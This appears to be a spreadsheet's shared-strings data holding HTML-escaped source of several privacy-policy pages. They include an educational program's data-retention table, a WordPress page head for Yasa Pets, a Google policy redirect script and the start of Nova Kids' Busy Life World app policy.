        &lt;/td&gt;
        &lt;td&gt;
          Activity customization. When
          de-identified and aggregated,
          used to analyze program usage.
        </t>
  </si>
  <si>
    <t>&lt;/td&gt;
        &lt;td&gt;Upon account closure&lt;sup&gt;1&lt;/sup&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Activity Data&lt;/td&gt;
        &lt;td&gt;
          Activity customization and creation of progress reports.
           When de-identified and aggregated, used to analyze program usage.
         &lt;/td&gt;
        &lt;td&gt;Upon account closure&lt;sup&gt;1&lt;/sup&gt;.</t>
  </si>
  <si>
    <t>Some data is deleted when user restarts a program.
           Detailed activity data is deleted after one year.
         &lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td rowspan="8"&gt;Parent or Teacher&lt;/td&gt;
        &lt;td&gt;Name, &amp;ldquo;addressed as&amp;rdquo; name, email address, hashed password&lt;/td&gt;
        &lt;td&gt;Account access and identification&lt;/td&gt;
        &lt;td&gt;Upon account closure&lt;sup&gt;2,&amp;nbsp;3&lt;/sup&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Email address&lt;/td&gt;
        &lt;td&gt;Send announcements, alerts, reports, and/or reminders via email&lt;/td&gt;
        &lt;td&gt;Processing ceases upon request.</t>
  </si>
  <si>
    <t xml:space="preserve">Data deletion upon account closure&lt;sup&gt;2,&amp;nbsp;3&lt;/sup&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Email address&lt;/td&gt;
        &lt;td&gt;
          Share with linked accounts that
          have access to same student or
          class (for increased transparency
          and security of student data)
         &lt;/td&gt;
        &lt;td&gt;Data deletion upon account closure&lt;sup&gt;2,&amp;nbsp;3&lt;/sup&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Account settings: account type, email preferences, time zone, etc.&lt;/td&gt;
        &lt;td&gt;Create progress reports and maintain data preferences&lt;/td&gt;
        &lt;td&gt;Upon account closure&lt;sup&gt;2,&amp;nbsp;3&lt;/sup&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Electronic identifiers: account change timestamps, version number, etc.&lt;/td&gt;
        &lt;td&gt;Technical support and account security&lt;/td&gt;
        &lt;td&gt;Upon account closure&lt;sup&gt;2,&amp;nbsp;3&lt;/sup&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Single-sign-on provider and hashed ID&lt;/td&gt;
        &lt;td&gt;Account access using optional 3rd party credential&lt;/td&gt;
        &lt;td&gt;Upon request or account closure&lt;sup&gt;2,&amp;nbsp;3&lt;/sup&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;IP address&lt;/td&gt;
        &lt;td&gt;Determine time zone upon sign-up&lt;/td&gt;
        &lt;td&gt;Not stored&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Hashed IP address&lt;/td&gt;
        &lt;td&gt;Account security&lt;/td&gt;
        &lt;td&gt;After 1 year or upon account closure&lt;sup&gt;2,&amp;nbsp;3&lt;/sup&gt;&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td rowspan="2"&gt;Teacher&lt;/td&gt;
        &lt;td&gt;Hashed IP address&lt;/td&gt;
        &lt;td&gt;Expedite classroom setup on multiple devices&lt;/td&gt;
        &lt;td&gt;After 24 hours&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Class name, class end date, student names&lt;/td&gt;
        &lt;td&gt;Create progress reports and facilitate program usage&lt;/td&gt;
        &lt;td&gt;Upon request, account closure&lt;sup&gt;3&lt;/sup&gt;, or one year after class end date.&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td rowspan="2"&gt;All Users&lt;/td&gt;
        &lt;td&gt;Hashed IP address, change logs&lt;/td&gt;
        &lt;td&gt;Network security&lt;/td&gt;
        &lt;td&gt;After 90 days&lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;De-identified and aggregated usage data&lt;/td&gt;
        &lt;td&gt;Product improvement and development, promotional activities, and educational research&lt;/td&gt;
        &lt;td&gt;Until no longer useful&lt;/td&gt;
      &lt;/tr&gt;
    &lt;/table&gt;
    &lt;ol type="1"&gt;
      &lt;li&gt;
        Student accounts: account closure occurs upon request, automatically after two years of
        account inactivity, or one month after being unlinked from all parent and teacher accounts.
       &lt;/li&gt;
      &lt;li&gt;
        Parent accounts: account closure occurs upon request, or automatically after two years
        of account inactivity.
      </t>
  </si>
  <si>
    <t>&lt;/li&gt;
      &lt;li&gt;Teacher accounts: account closure occurs upon request.&lt;/li&gt;
    &lt;/ol&gt;
  &lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html lang="en-US" &gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
    &lt;title&gt;Privacy Policy &amp;#8211; Yasa Pets&lt;/title&gt;
&lt;script type="text/javascript"&gt;var ajaxurl = "https://www.yasapets.com/wp-admin/admin-ajax.php"&lt;/script&gt;&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;style id="critical-path-css" type='text/css'&gt;body,html{width:100%;height:100%;margin:0;padding:0}.page-preloader{top:0;left:0;z-index:999;position:fixed;height:100%;width:100%;text-align:center}.preloader-logo,.preloader-preview-area{top:50%;max-height:calc(50% - 20px);opacity:1}.preloader-preview-area{-webkit-animation-delay:-.2s;animation-delay:-.2s;-webkit-transform:translateY(100%);-ms-transform:translateY(100%);transform:translateY(100%);margin-top:10px;width:100%;text-align:center;position:absolute}.preloader-logo{max-width:90%;-webkit-transform:translateY(-100%);-ms-transform:translateY(-100%);transform:translateY(-100%);margin:-10px auto 0;position:relative}.ball-pulse&gt;div,.ball-scale&gt;div,.line-scale&gt;div{margin:2px;display:inline-block}.ball-pulse&gt;div{width:15px;height:15px;border-radius:100%;-webkit-animation:ball-pulse .75s infinite cubic-bezier(.2,.68,.18,1.08);animation:ball-pulse .75s infinite cubic-bezier(.2,.68,.18,1.08)}.ball-pulse&gt;div:nth-child(1){-webkit-animation-delay:-.36s;animation-delay:-.36s}.ball-pulse&gt;div:nth-child(2){-webkit-animation-delay:-.24s;animation-delay:-.24s}.ball-pulse&gt;div:nth-child(3){-webkit-animation-delay:-.12s;animation-delay:-.12s}@-webkit-keyframes ball-pulse{0%,80%{-webkit-transform:scale(1);transform:scale(1);opacity:1}45%{-webkit-transform:scale(.1);transform:scale(.1);opacity:.7}}@keyframes ball-pulse{0%,80%{-webkit-transform:scale(1);transform:scale(1);opacity:1}45%{-webkit-transform:scale(.1);transform:scale(.1);opacity:.7}}.ball-clip-rotate-pulse{position:relative;-webkit-transform:translateY(-15px);-ms-transform:translateY(-15px);transform:translateY(-15px);display:inline-block}.ball-clip-rotate-pulse&gt;div{-webkit-animation-fill-mode:both;animation-fill-mode:both;position:absolute;top:0;left:0;border-radius:100%}.ball-clip-rotate-pulse&gt;div:first-child{height:36px;width:36px;top:7px;left:-7px;-webkit-animation:ball-clip-rotate-pulse-scale 1s 0s cubic-bezier(.09,.57,.49,.9) infinite;animation:ball-clip-rotate-pulse-scale 1s 0s cubic-bezier(.09,.57,.49,.9) infinite}.ball-clip-rotate-pulse&gt;div:last-child{position:absolute;width:50px;height:50px;left:-16px;top:-2px;background:0 0;border:2px solid;-webkit-animation:ball-clip-rotate-pulse-rotate 1s 0s cubic-bezier(.09,.57,.49,.9) infinite;animation:ball-clip-rotate-pulse-rotate 1s 0s</t>
  </si>
  <si>
    <t>cubic-bezier(.09,.57,.49,.9) infinite;-webkit-animation-duration:1s;animation-duration:1s}@-webkit-keyframes ball-clip-rotate-pulse-rotate{0%{-webkit-transform:rotate(0) scale(1);transform:rotate(0) scale(1)}50%{-webkit-transform:rotate(180deg) scale(.6);transform:rotate(180deg) scale(.6)}100%{-webkit-transform:rotate(360deg) scale(1);transform:rotate(360deg) scale(1)}}@keyframes ball-clip-rotate-pulse-rotate{0%{-webkit-transform:rotate(0) scale(1);transform:rotate(0) scale(1)}50%{-webkit-transform:rotate(180deg) scale(.6);transform:rotate(180deg) scale(.6)}100%{-webkit-transform:rotate(360deg) scale(1);transform:rotate(360deg) scale(1)}}@-webkit-keyframes ball-clip-rotate-pulse-scale{30%{-webkit-transform:scale(.3);transform:scale(.3)}100%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes ball-clip-rotate-pulse-scale{30%{-webkit-transform:scale(.3);transform:scale(.3)}100%{-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes square-spin{25%{-webkit-transform:perspective(100px) rotateX(180deg) rotateY(0);transform:perspective(100px) rotateX(180deg) rotateY(0)}50%{-webkit-transform:perspective(100px) rotateX(180deg) rotateY(180deg);transform:perspective(100px) rotateX(180deg) rotateY(180deg)}75%{-webkit-transform:perspective(100px) rotateX(0) rotateY(180deg);transform:perspective(100px) rotateX(0) rotateY(180deg)}100%{-webkit-transform:perspective(100px) rotateX(0) rotateY(0);transform:perspective(100px) rotateX(0) rotateY(0)}}@keyframes square-spin{25%{-webkit-transform:perspective(100px) rotateX(180deg) rotateY(0);transform:perspective(100px) rotateX(180deg)</t>
  </si>
  <si>
    <t>rotateY(0)}50%{-webkit-transform:perspective(100px) rotateX(180deg) rotateY(180deg);transform:perspective(100px) rotateX(180deg) rotateY(180deg)}75%{-webkit-transform:perspective(100px) rotateX(0) rotateY(180deg);transform:perspective(100px) rotateX(0) rotateY(180deg)}100%{-webkit-transform:perspective(100px) rotateX(0) rotateY(0);transform:perspective(100px) rotateX(0) rotateY(0)}}.square-spin{display:inline-block}.square-spin&gt;div{width:50px;height:50px;-webkit-animation:square-spin 3s 0s cubic-bezier(.09,.57,.49,.9) infinite;animation:square-spin 3s 0s cubic-bezier(.09,.57,.49,.9) infinite}.cube-transition{position:relative;-webkit-transform:translate(-25px,-25px);-ms-transform:translate(-25px,-25px);transform:translate(-25px,-25px);display:inline-block}.cube-transition&gt;div{width:15px;height:15px;position:absolute;top:-5px;left:-5px;-webkit-animation:cube-transition 1.6s 0s infinite ease-in-out;animation:cube-transition 1.6s 0s infinite ease-in-out}.cube-transition&gt;div:last-child{-webkit-animation-delay:-.8s;animation-delay:-.8s}@-webkit-keyframes cube-transition{25%{-webkit-transform:translateX(50px) scale(.5) rotate(-90deg);transform:translateX(50px) scale(.5) rotate(-90deg)}50%{-webkit-transform:translate(50px,50px) rotate(-180deg);transform:translate(50px,50px) rotate(-180deg)}75%{-webkit-transform:translateY(50px) scale(.5) rotate(-270deg);transform:translateY(50px) scale(.5) rotate(-270deg)}100%{-webkit-transform:rotate(-360deg);transform:rotate(-360deg)}}@keyframes cube-transition{25%{-webkit-transform:translateX(50px) scale(.5) rotate(-90deg);transform:translateX(50px) scale(.5) rotate(-90deg)}50%{-webkit-transform:translate(50px,50px) rotate(-180deg);transform:translate(50px,50px) rotate(-180deg)}75%{-webkit-transform:translateY(50px) scale(.5) rotate(-270deg);transform:translateY(50px) scale(.5) rotate(-270deg)}100%{-webkit-transform:rotate(-360deg);transform:rotate(-360deg)}}.ball-scale&gt;div{border-radius:100%;height:60px;width:60px;-webkit-animation:ball-scale 1s 0s ease-in-out infinite;animation:ball-scale 1s 0s ease-in-out infinite}@-webkit-keyframes ball-scale{0%{-webkit-transform:scale(0);transform:scale(0)}100%{-webkit-transform:scale(1);transform:scale(1);opacity:0}}@keyframes ball-scale{0%{-webkit-transform:scale(0);transform:scale(0)}100%{-webkit-transform:scale(1);transform:scale(1);opacity:0}}.line-scale&gt;div{-webkit-animation-fill-mode:both;animation-fill-mode:both;width:5px;height:50px;border-radius:2px}.line-scale&gt;div:nth-child(1){-webkit-animation:line-scale 1s -.5s infinite cubic-bezier(.2,.68,.18,1.08);animation:line-scale 1s -.5s infinite cubic-bezier(.2,.68,.18,1.08)}.line-scale&gt;div:nth-child(2){-webkit-animation:line-scale 1s -.4s infinite cubic-bezier(.2,.68,.18,1.08);animation:line-scale 1s -.4s infinite cubic-bezier(.2,.68,.18,1.08)}.line-scale&gt;div:nth-child(3){-webkit-animation:line-scale 1s -.3s infinite cubic-bezier(.2,.68,.18,1.08);animation:line-scale 1s -.3s infinite cubic-bezier(.2,.68,.18,1.08)}.line-scale&gt;div:nth-child(4){-webkit-animation:line-scale 1s -.2s infinite cubic-bezier(.2,.68,.18,1.08);animation:line-scale 1s -.2s infinite cubic-bezier(.2,.68,.18,1.08)}.line-scale&gt;div:nth-child(5){-webkit-animation:line-scale 1s -.1s infinite cubic-bezier(.2,.68,.18,1.08);animation:line-scale 1s -.1s</t>
  </si>
  <si>
    <t>infinite cubic-bezier(.2,.68,.18,1.08)}@-webkit-keyframes line-scale{0%,100%{-webkit-transform:scaley(1);transform:scaley(1)}50%{-webkit-transform:scaley(.4);transform:scaley(.4)}}@keyframes line-scale{0%,100%{-webkit-transform:scaley(1);transform:scaley(1)}50%{-webkit-transform:scaley(.4);transform:scaley(.4)}}.ball-scale-multiple{position:relative;-webkit-transform:translateY(30px);-ms-transform:translateY(30px);transform:translateY(30px);display:inline-block}.ball-scale-multiple&gt;div{border-radius:100%;position:absolute;left:-30px;top:0;opacity:0;margin:0;width:50px;height:50px;-webkit-animation:ball-scale-multiple 1s 0s linear infinite;animation:ball-scale-multiple 1s 0s linear infinite}.ball-scale-multiple&gt;div:nth-child(2),.ball-scale-multiple&gt;div:nth-child(3){-webkit-animation-delay:-.2s;animation-delay:-.2s}@-webkit-keyframes ball-scale-multiple{0%{-webkit-transform:scale(0);transform:scale(0);opacity:0}5%{opacity:1}100%{-webkit-transform:scale(1);transform:scale(1);opacity:0}}@keyframes ball-scale-multiple{0%{-webkit-transform:scale(0);transform:scale(0);opacity:0}5%{opacity:1}100%{-webkit-transform:scale(1);transform:scale(1);opacity:0}}.ball-pulse-sync{display:inline-block}.ball-pulse-sync&gt;div{width:15px;height:15px;border-radius:100%;margin:2px;-webkit-animation-fill-mode:both;animation-fill-mode:both;display:inline-block}.ball-pulse-sync&gt;div:nth-child(1){-webkit-animation:ball-pulse-sync .6s -.21s infinite ease-in-out;animation:ball-pulse-sync .6s -.21s</t>
  </si>
  <si>
    <t>infinite ease-in-out}.ball-pulse-sync&gt;div:nth-child(2){-webkit-animation:ball-pulse-sync .6s -.14s infinite ease-in-out;animation:ball-pulse-sync .6s -.14s infinite ease-in-out}.ball-pulse-sync&gt;div:nth-child(3){-webkit-animation:ball-pulse-sync .6s -70ms infinite ease-in-out;animation:ball-pulse-sync .6s -70ms infinite ease-in-out}@-webkit-keyframes ball-pulse-sync{33%{-webkit-transform:translateY(10px);transform:translateY(10px)}66%{-webkit-transform:translateY(-10px);transform:translateY(-10px)}100%{-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes ball-pulse-sync{33%{-webkit-transform:translateY(10px);transform:translateY(10px)}66%{-webkit-transform:translateY(-10px);transform:translateY(-10px)}100%{-webkit-transform:translateY(0);transform:translateY(0)}}.transparent-circle{display:inline-block;border-top:.5em solid rgba(255,255,255,.2);border-right:.5em solid rgba(255,255,255,.2);border-bottom:.5em solid rgba(255,255,255,.2);border-left:.5em solid #fff;-webkit-transform:translateZ(0);transform:translateZ(0);-webkit-animation:transparent-circle 1.1s infinite linear;animation:transparent-circle 1.1s infinite linear;width:50px;height:50px;border-radius:50%}.transparent-circle:after{border-radius:50%;width:10em;height:10em}@-webkit-keyframes transparent-circle{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes transparent-circle{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}.ball-spin-fade-loader{position:relative;top:-10px;left:-10px;display:inline-block}.ball-spin-fade-loader&gt;div{width:15px;height:15px;border-radius:100%;margin:2px;position:absolute;-webkit-animation:ball-spin-fade-loader 1s infinite linear;animation:ball-spin-fade-loader 1s infinite linear}.ball-spin-fade-loader&gt;div:nth-child(1){top:25px;left:0;animation-delay:-.84s;-webkit-animation-delay:-.84s}.ball-spin-fade-loader&gt;div:nth-child(2){top:17.05px;left:17.05px;animation-delay:-.72s;-webkit-animation-delay:-.72s}.ball-spin-fade-loader&gt;div:nth-child(3){top:0;left:25px;animation-delay:-.6s;-webkit-animation-delay:-.6s}.ball-spin-fade-loader&gt;div:nth-child(4){top:-17.05px;left:17.05px;animation-delay:-.48s;-webkit-animation-delay:-.48s}.ball-spin-fade-loader&gt;div:nth-child(5){top:-25px;left:0;animation-delay:-.36s;-webkit-animation-delay:-.36s}.ball-spin-fade-loader&gt;div:nth-child(6){top:-17.05px;left:-17.05px;animation-delay:-.24s;-webkit-animation-delay:-.24s}.ball-spin-fade-loader&gt;div:nth-child(7){top:0;left:-25px;animation-delay:-.12s;-webkit-animation-delay:-.12s}.ball-spin-fade-loader&gt;div:nth-child(8){top:17.05px;left:-17.05px;animation-delay:0s;-webkit-animation-delay:0s}@-webkit-keyframes ball-spin-fade-loader{50%{opacity:.3;-webkit-transform:scale(.4);transform:scale(.4)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes ball-spin-fade-loader{50%{opacity:.3;-webkit-transform:scale(.4);transform:scale(.4)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}&lt;/style&gt;
&lt;meta charset="UTF-8" /&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=0" /&gt;
&lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&gt;
&lt;meta name="format-detection" content="telephone=no"&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Yasa Pets &amp;raquo; Feed" href="https://www.yasapets.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Yasa Pets &amp;raquo; Comments Feed" href="https://www.yasapets.com/comments/feed/" /&gt;
&lt;link rel="shortcut icon" href="https://www.yasapets.com/wp-content/uploads/2017/11/favicon.png"  /&gt;
&lt;script type="text/javascript"&gt;
window.abb = {};
php = {};
window. PHP = {};
PHP.ajax = "https://www.yasapets.com/wp-admin/admin-ajax.php";var mk_header_parallax, mk_banner_parallax, mk_page_parallax, mk_footer_parallax, mk_body_parallax;
var mk_images_dir = "https://www.yasapets.com/wp-content/themes/jupiter/assets/images",
mk_theme_js_path = "https://www.yasapets.com/wp-content/themes/jupiter/assets/js",
mk_theme_dir = "https://www.yasapets.com/wp-content/themes/jupiter",
mk_captcha_placeholder = "Enter Captcha",
mk_captcha_invalid_txt = "Invalid. Try again.</t>
  </si>
  <si>
    <t>",
mk_captcha_correct_txt = "Captcha correct. ",
mk_responsive_nav_width = 1140,
mk_vertical_header_back = "Back",
mk_vertical_header_anim = "1",
mk_check_rtl = true,
mk_grid_width = 1140,
mk_ajax_search_option = "fullscreen_search",
mk_preloader_bg_color = "#f7ece6",
mk_accent_color = "#f97352",
mk_go_to_top =  "true",
mk_smooth_scroll =  "true",
mk_preloader_bar_color = "#f97352",
mk_preloader_logo = "https://www.yasapets.com/wp-content/uploads/2017/11/favicon.png";
var mk_header_parallax = false,
mk_banner_parallax = false,
mk_page_parallax = false,
mk_footer_parallax = false,
mk_body_parallax = false,
mk_no_more_posts = "No More Posts";
&lt;/script&gt;
&lt;script type="text/javascript"&gt;
 window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.yasapets.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2"}};
/*!</t>
  </si>
  <si>
    <t>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id='wp-block-library-css' href='https://www.yasapets.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://www.yasapets.com/wp-includes/css/classic-themes.min.css?ver=6.2' type='text/css' media='all' /&gt;
&lt;style id='global-styles-inline-css' type='text/css'&gt;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t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='js-media-query-css' href='https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/min/media.css?ver=5.0.10' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='theme-styles-css' href='https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/min/styles.css?ver=5.0.10' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='theme-icons-css' href='https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/min/theme-icons.css?ver=5.0.10' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='google-font-api-special-1-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A100italic%2C200italic%2C300italic%2C400italic%2C500italic%2C600italic%2C700italic%2C800italic%2C900italic%2C100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900&amp;#038;ver=6.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='mk-style-css' href='https://www.yasapets.com/wp-content/themes/jupiter/style.css?ver=6.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='theme-dynamic-styles-css' href='https://www.yasapets.com/wp-content/themes/jupiter/custom.css?ver=6.2' type='text/css' media='all' /&gt;
&lt;style id='theme-dynamic-styles-inline-css' type='text/css'&gt;
body { background-color:#fff; } .mk-header { background-color:#f7f7f7;background-size:cover;-webkit-background-size:cover;-moz-background-size:cover; } .mk-header-bg { background-color:#fff; } .mk-classic-nav-bg { background-color:#fff; } #theme-page { background-color:#fff; } #mk-footer { background-color:#3d4045; } #mk-boxed-layout { -webkit-box-shadow:0 0 0px rgba(0, 0, 0, 0); -moz-box-shadow:0 0 0px rgba(0, 0, 0, 0); box-shadow:0 0 0px rgba(0, 0, 0, 0); } .mk-news-tab .mk-tabs-tabs .is-active a, .mk-fancy-title.pattern-style span, .mk-fancy-title.pattern-style.color-gradient span:after, .page-bg-color { background-color:#fff; } .page-title { font-size:20px; color:#4d4d4d; text-transform:uppercase; font-weight:400; letter-spacing:2px; } .page-subtitle { font-size:14px; line-height:100%; color:#a3a3a3; font-size:14px; text-transform:none; } .mk-header { border-bottom:1px solid #ededed; } .header-style-1 .mk-header-padding-wrapper, .header-style-2 .mk-header-padding-wrapper, .header-style-3 .mk-header-padding-wrapper { padding-top:91px; } @font-face { font-family:'Pe-icon-line'; src:url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/pe-line-icons/Pe-icon-line.eot?lqevop'); src:url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/pe-line-icons/Pe-icon-line.eot?#iefixlqevop') format('embedded-opentype'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/pe-line-icons/Pe-icon-line.woff?lqevop') format('woff'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/pe-line-icons/Pe-icon-line.ttf?lqevop') format('truetype'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/pe-line-icons/Pe-icon-line.svg?lqevop#Pe-icon-line') format('svg'); font-weight:normal; font-style:normal; } @font-face { font-family:'FontAwesome'; src:url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/awesome-icons/fontawesome-webfont.eot?v=4.2'); src:url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/awesome-icons/fontawesome-webfont.eot?#iefix&amp;v=4.2') format('embedded-opentype'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/awesome-icons/fontawesome-webfont.woff?v=4.2') format('woff'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/awesome-icons/fontawesome-webfont.ttf?v=4.2') format('truetype'); font-weight:normal; font-style:normal; } @font-face { font-family:'Icomoon'; src:url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/icomoon/fonts-icomoon.eot'); src:url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/icomoon/fonts-icomoon.eot?#iefix') format('embedded-opentype'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/icomoon/fonts-icomoon.woff') format('woff'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/icomoon/fonts-icomoon.ttf') format('truetype'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/icomoon/fonts-icomoon.svg#Icomoon') format('svg'); font-weight:normal; font-style:normal; } @font-face { font-family:'themeIcons'; src:url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/theme-icons/theme-icons.eot?wsvj4f'); src:url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/theme-icons/theme-icons.eot?#iefixwsvj4f') format('embedded-opentype'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/theme-icons/theme-icons.woff?wsvj4f') format('woff'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/theme-icons/theme-icons.ttf?wsvj4f') format('truetype'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/theme-icons/theme-icons.svg?wsvj4f#icomoon') format('svg'); font-weight:normal; font-style:normal; } @font-face { font-family:'star'; src:url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/woocommerce/star.eot'); src:url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/woocommerce/star.eot?#iefix') format('embedded-opentype'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/woocommerce/star.woff') format('woff'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/woocommerce/star.ttf') format('truetype'), url('https://www.yasapets.com/wp-content/themes/jupiter/assets/stylesheet/icons/woocommerce/star.svg#star') format('svg'); font-weight:normal; font-</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;title&gt;&lt;/title&gt;&lt;noscript&gt;
&lt;meta content="0; URL=https://policies.google.com/privacy?hl=en&amp;amp;gl=us" http-equiv="refresh"&gt;&lt;/noscript&gt;
&lt;a href="https://policies.google.com/privacy?hl=en&amp;amp;gl=us" id="link"&gt;https://policies.google.com/privacy?hl=en&amp;amp;gl=us&lt;/a&gt; 
&lt;script nonce="PYhKRUFHArdP9ZC04rl_Zw"&gt;
var url="https://policies.google.com/privacy";
try{var curl=window.location.href;var match=curl.match(/\/intl\/([^\/]+)\/policies/);var locale=match&amp;&amp;match[1];var hl;var gl;if(locale){if(locale.indexOf("_")&gt;0){var parts=locale.split("_");hl=parts[0];gl=parts[1]}else hl=locale;if(hl=="ALL")hl=null;if(gl=="ALL")gl=null}
if (URL&amp;&amp;(!hl||!gl)){ var cu=new URL(curl);hl=hl||cu.searchParams.get("hl");gl=gl||cu.searchParams.get("gl");}
if (URL&amp;&amp;curl.indexOf("authuser")!==-1){var cu=new URL(curl);var authuser=parseInt(cu.searchParams.get("authuser"),10);if(!isNaN(authuser))url=url.replace('.com/','.com/u/'+authuser+'/');}
if(!gl){var tld=location.hostname.split(".").pop().toLowerCase();if(tld&amp;&amp;tld.length==2)gl =tld;if(tld=="cn")url=url.replace(".com/",".cn/")}
 if(hl&amp;&amp;gl)url+="?hl="+encodeURIComponent(hl)+"&amp;gl="+encodeURIComponent(gl);else if(hl)url+="?hl="+encodeURIComponent(hl);else if(gl)url+="?gl="+encodeURIComponent(gl);var link=document.getElementById("link");if(link){link.innerText=url;link.href=url}}catch(e){}if(window.location.hash)url+=window.location.hash;window.location.href=url;
&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width"&gt;
&lt;title&gt;Privacy Policy&lt;/title&gt;
&lt;style&gt; body { font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; padding:1em; } &lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;strong&gt;Privacy Policy&lt;/strong&gt; &lt;p&gt;
Nova Kids built the Busy Life World app as
a Freemium app. This SERVICE is provided by
Nova Kids at no cost and is intended for use as
is.
 &lt;/p&gt; &lt;p&gt;
</t>
  </si>
  <si>
    <t>This page is used to inform visitors regarding our
policies with the collection, use, and disclosure of Personal
Information if anyone decided to use our Service.
 &lt;/p&gt; &lt;p&gt;
If you choose to use our Service, then you agree to
the collection and use of information in relation to this
policy. The Personal Information that we collect is
used for providing and improving the Service.</t>
  </si>
  <si>
    <t xml:space="preserve">We will not use or share your information with
anyone except as described in this Privacy Policy.
 &lt;/p&gt; &lt;p&gt;
 The terms used in this Privacy Policy have the same meanings
as in our Terms and Conditions, which is accessible at
Busy Life World unless otherwise defined in this Privacy Policy.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Information Collection and Use&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;
 For a better experience, while using our Service, we
may require you to provide us with certain personally
identifiable information. The information that
we request will be retained by us and used as described in this privacy policy.
</t>
  </si>
  <si>
